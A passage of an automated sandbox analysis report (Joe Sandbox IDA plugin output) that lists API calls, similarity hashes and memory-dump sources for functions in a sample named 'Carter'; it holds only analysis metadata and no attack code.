  • Part of subcall function 0100A3F8: ___crtMessageBoxW.LIBCMT ref: 0100A538
  • Part of subcall function 010032CF: ___crtCorExitProcess.LIBCMT ref: 010032D5
  • Part of subcall function 010032CF: ExitProcess.KERNEL32 ref: 010032DE
  • Part of subcall function 01008D58: __getptd_noexit.LIBCMT ref: 01008D58
• RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,?,00000004,?,?,01001003,?), ref: 0100597F
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
• Opcode ID: fdad44024b87ae9cbaf12a52340e531564d75c77b5c2b2a2e02791061237c8cd
• Instruction ID: 3a548cd20595f1d8c02dfa1e8d83b110ec3b75733da4359905674b274cb98386
• Opcode Fuzzy Hash: fdad44024b87ae9cbaf12a52340e531564d75c77b5c2b2a2e02791061237c8cd
• Instruction Fuzzy Hash: C701B132745B079EF6633B68AC40AAE3398AF63670F500577E5D5AF1D0DEB588008FA1
APIs
• _free.LIBCMT ref: 010492D6
  • Part of subcall function 01002F85: RtlFreeHeap.NTDLL(00000000,00000000,?,01009C54,00000000,01008D5D,010059C3), ref: 01002F99
  • Part of subcall function 01002F85: GetLastError.KERNEL32(00000000,?,01009C54,00000000,01008D5D,010059C3), ref: 01002FAB
• _free.LIBCMT ref: 010492E7
• _free.LIBCMT ref: 010492F9
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
• Instruction ID: deba26105f1712cd8d3b70e8b05ed447b55f4f3e1674279e82f742e3dde271f0
• Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
• Instruction Fuzzy Hash: 45E0C2E120460343EA20A53C6A84EE37BEC0F8C291B54057DB589D3181CE20E4408028
Similarity
• API ID:
• String ID: CALL
• API String ID: 0-4196123274
• Opcode ID: 3adc8d8a693300eb9ff77ebc1fc9634e478deb1a26515ef9cd49f807e1fcff90
• Instruction ID: e08bdd17fd60924e0e539470d19c20a87d0198bbd3c829800d3dbeb4e9703bdb
• Opcode Fuzzy Hash: 3adc8d8a693300eb9ff77ebc1fc9634e478deb1a26515ef9cd49f807e1fcff90
• Instruction Fuzzy Hash: 3E328970908385CFDB25DF15C480B6ABBE1BF94754F14896DE88A8B361D739EC41EB82
Similarity
• API ID: _memmove
• String ID: EA06
• API String ID: 4104443479-3962188686
• Opcode ID: 40ab430254c0d53777eab1fba947f95f4889e3987efe44ad178f5bee6af8f165
• Instruction ID: 28856ff671de496b423398b3681361375e2fac6348df56bbbe77a03614250361
• Opcode Fuzzy Hash: 40ab430254c0d53777eab1fba947f95f4889e3987efe44ad178f5bee6af8f165
• Instruction Fuzzy Hash: 05418B22B0415C5BDF329F688C417BF7FA58F46310F2840B4FAC2EA2A6D565AD44A3E1
APIs
• _strcat.LIBCMT ref: 0105E20C
  • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
  • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
• _wcscpy.LIBCMT ref: 0105E29B
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: __itow__swprintf_strcat_wcscpy
• String ID:
• API String ID: 1012013722-0
APIs
• CharLowerBuffW.USER32(?,?), ref: 0104614E
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: BuffCharLower
• String ID:
• API String ID: 2358735015-0
APIs
• CloseHandle.KERNEL32 ref: 01000ED5
• CreateToolhelp32Snapshot.KERNEL32 ref: 01000EE7
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: CloseCreateHandleSnapshotToolhelp32
• String ID:
• API String ID: 3280610774-0
APIs
• IsThemeActive.UXTHEME ref: 00FF5FEF
  • Part of subcall function 0100359C: __lock.LIBCMT ref: 010035A2
  • Part of subcall function 0100359C: DecodePointer.KERNEL32(00000001,?,00FF6004,01038892), ref: 010035AE
  • Part of subcall function 0100359C: EncodePointer.KERNEL32(?,?,00FF6004,01038892), ref: 010035B9
  • Part of subcall function 00FF5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FF5F18
  • Part of subcall function 00FF5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FF5F2D
  • Part of subcall function 00FF5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FF526C
  • Part of subcall function 00FF5240: IsDebuggerPresent.KERNEL32 ref: 00FF527E
  • Part of subcall function 00FF5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00FF52E6
  • Part of subcall function 00FF5240: SetCurrentDirectoryW.KERNEL32(?), ref: 00FF5366
• SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00FF602F
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
• String ID:
• API String ID: 1438897964-0
APIs
• CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00FF3E72,?,?,?,00000000), ref: 00FF4327
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00FF3E72,?,?,?,00000000), ref: 01030717
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
  • Part of subcall function 0100593C: __FF_MSGBANNER.LIBCMT ref: 01005953
  • Part of subcall function 0100593C: __NMSG_WRITE.LIBCMT ref: 0100595A
  • Part of subcall function 0100593C: RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,?,00000004,?,?,01001003,?), ref: 0100597F
• std::exception::exception.LIBCMT ref: 0100101C
• __CxxThrowException@8.LIBCMT ref: 01001031
  • Part of subcall function 010087CB: RaiseException.KERNEL32(?,?,?,0109CAF8,?,?,?,?,?,01001036,?,0109CAF8,?,00000001), ref: 01008820
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
• String ID:
• API String ID: 3902256705-0
APIs
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: __lock_file_memset
• String ID:
• API String ID: 26237723-0
APIs
  • Part of subcall function 01008D58: __getptd_noexit.LIBCMT ref: 01008D58
• __lock_file.LIBCMT ref: 0100560B
  • Part of subcall function 01006E3E: __lock.LIBCMT ref: 01006E61
• __fclose_nolock.LIBCMT ref: 01005616
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
APIs
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: SleepTimetime
• String ID:
• API String ID: 346578373-0
APIs
• __lock_file.LIBCMT ref: 01005EB4
• __ftell_nolock.LIBCMT ref: 01005EBF
  • Part of subcall function 01008D58: __getptd_noexit.LIBCMT ref: 01008D58
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: __ftell_nolock__getptd_noexit__lock_file
• String ID:
• API String ID: 2999321469-0
APIs
• _memset.LIBCMT ref: 00FF5AEF
• Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FF5B1F
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: IconNotifyShell__memset
• String ID:
• API String ID: 928536360-0
                                                                        • Opcode ID: 2266c483224c8494f0f4f341b02bc7b701b0d5960d0183929d76fd882dbbd632
                                                                        • Instruction ID: e04b5999cb0a0dd0ccc0ebf4381e571f6f50316ab1da673281a2cbc2f51d83db
                                                                        • Opcode Fuzzy Hash: 2266c483224c8494f0f4f341b02bc7b701b0d5960d0183929d76fd882dbbd632
                                                                        • Instruction Fuzzy Hash: D0F082719043089FD7A38B2498457A577BC9701308F0001E9AA8896289DB774B88CB51
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString$__swprintf
                                                                        • String ID:
                                                                        • API String ID: 207118244-0
                                                                        • Opcode ID: 549db3bf94e36e6dc9c4d15491b77f3e5772b5d87454884969afc212e9e1b539
                                                                        • Instruction ID: bf85602614e573a2dd9f1df689e79fe24625b4c8ec2d710a0c51842e313a6742
                                                                        • Opcode Fuzzy Hash: 549db3bf94e36e6dc9c4d15491b77f3e5772b5d87454884969afc212e9e1b539
                                                                        • Instruction Fuzzy Hash: 1BB16075A0020ADFDB54EF98C880DFEBBB9FF48710F14815AF955A7291DB34AA41CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c36f77044348828147aa364c2673c521f5977255d55e477ca21e101818d50377
                                                                        • Instruction ID: fb7d10c33a9326c939d92fb7d6f515986a66ded62313399ade07038702e72534
                                                                        • Opcode Fuzzy Hash: c36f77044348828147aa364c2673c521f5977255d55e477ca21e101818d50377
                                                                        • Instruction Fuzzy Hash: D261A871A002869FDB10EF65C880BBEB7E5EF44310F11806DE9568B292E774FD81EB52
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e262b7764506d2459232e128ca873ab004b9a542bf418da1c067d03444ee3771
                                                                        • Instruction ID: 91cb6f82a73f1a5d4b941c8b8de0b098ed65c3b2955cbbe8dbd2830dbddbc43e
                                                                        • Opcode Fuzzy Hash: e262b7764506d2459232e128ca873ab004b9a542bf418da1c067d03444ee3771
                                                                        • Instruction Fuzzy Hash: D951B2357002199BDB15EF68CD91FBE77A6AF85310F1440A8F946AB392CB34ED01EB44
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                                        • Instruction ID: 8f45dc280af4bf6f389090d16f6a67b4c7ef47156437162529ffb803992f2961
                                                                        • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                                        • Instruction Fuzzy Hash: 0C31C275604607DFD725DF18D440A31F7A0FF48360B18C56DEA8A8B7A4D730E881EB94
                                                                        APIs
                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00FF41B2
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: a13e6ca02e9b93a5dd93667494e99d6379f40ca9f885e8e46b40bd554d88ff7e
                                                                        • Instruction ID: f8097c56362a5cd156ed9555b43fd57aa9e2ec5712b5662c68c40a183811309b
                                                                        • Opcode Fuzzy Hash: a13e6ca02e9b93a5dd93667494e99d6379f40ca9f885e8e46b40bd554d88ff7e
                                                                        • Instruction Fuzzy Hash: B1318371A00619AFDB19CF2CC8806AEB7B5FF58320F148629E91593724D770BD90DB90
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 8c1b3106099b58f3f632b755b5261199fe6db5bedc17a0a95eecacf186d021fb
                                                                        • Instruction ID: 27c8739940ed9a4d7e63b79bbd286f0c6792662cb6febf6e0c8ebc156e30c108
                                                                        • Opcode Fuzzy Hash: 8c1b3106099b58f3f632b755b5261199fe6db5bedc17a0a95eecacf186d021fb
                                                                        • Instruction Fuzzy Hash: DE415974908385CFDB25CF15C488B1ABBE1BF55358F0988ACF8898B362C376E845DB52
                                                                        APIs
                                                                          • Part of subcall function 00FF4B29: FreeLibrary.KERNEL32(00000000,?), ref: 00FF4B63
                                                                          • Part of subcall function 0100547B: __wfsopen.LIBCMT ref: 01005486
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00FF27AF,?,00000001), ref: 00FF49F4
                                                                          • Part of subcall function 00FF4ADE: FreeLibrary.KERNEL32(00000000), ref: 00FF4B18
                                                                          • Part of subcall function 00FF48B0: _memmove.LIBCMT ref: 00FF48FA
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                                        • String ID:
                                                                        • API String ID: 1396898556-0
                                                                        • Opcode ID: 129af18f4b615d8ce8c102dd6866fe810b93e798e4c1570324bba3ef8e01b69f
                                                                        • Instruction ID: 640d8bf1e96d6a22ef2464bdb2df1b067f64d31889de5672c283370888549b41
                                                                        • Opcode Fuzzy Hash: 129af18f4b615d8ce8c102dd6866fe810b93e798e4c1570324bba3ef8e01b69f
                                                                        • Instruction Fuzzy Hash: 3A11C43265020DABDB10EF748C02FBF76A99F44701F10442DF681A61A1EABDAA11B794
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: ed768318928ad9db74eb72ab79bc14ac0b3ac671dc733207cff94445e1afad0c
                                                                        • Instruction ID: 00bbf30ff81dcbb6d83faf5e4a2329f9158aec438412b291d65603e745cde3ab
                                                                        • Opcode Fuzzy Hash: ed768318928ad9db74eb72ab79bc14ac0b3ac671dc733207cff94445e1afad0c
                                                                        • Instruction Fuzzy Hash: 04114976604605DFD724CF28D480A66B7E9FF49364B20882EE98ACB761E732E841DF50
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 1876e451b94bd7ef1652a70f1083e56d360e28a68fbb063467235872764829a1
                                                                        • Instruction ID: 6be29546166c09ce5fe548d0a628b84a26cfc5e0eb1c08f8916446db6fd741ef
                                                                        • Opcode Fuzzy Hash: 1876e451b94bd7ef1652a70f1083e56d360e28a68fbb063467235872764829a1
                                                                        • Instruction Fuzzy Hash: EC2130B4A08385CFDB25CF14C444B1ABBE1BF98304F05896CF98A97361C735E809DBA2
                                                                        APIs
                                                                        • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00FF3CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00FF4276
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
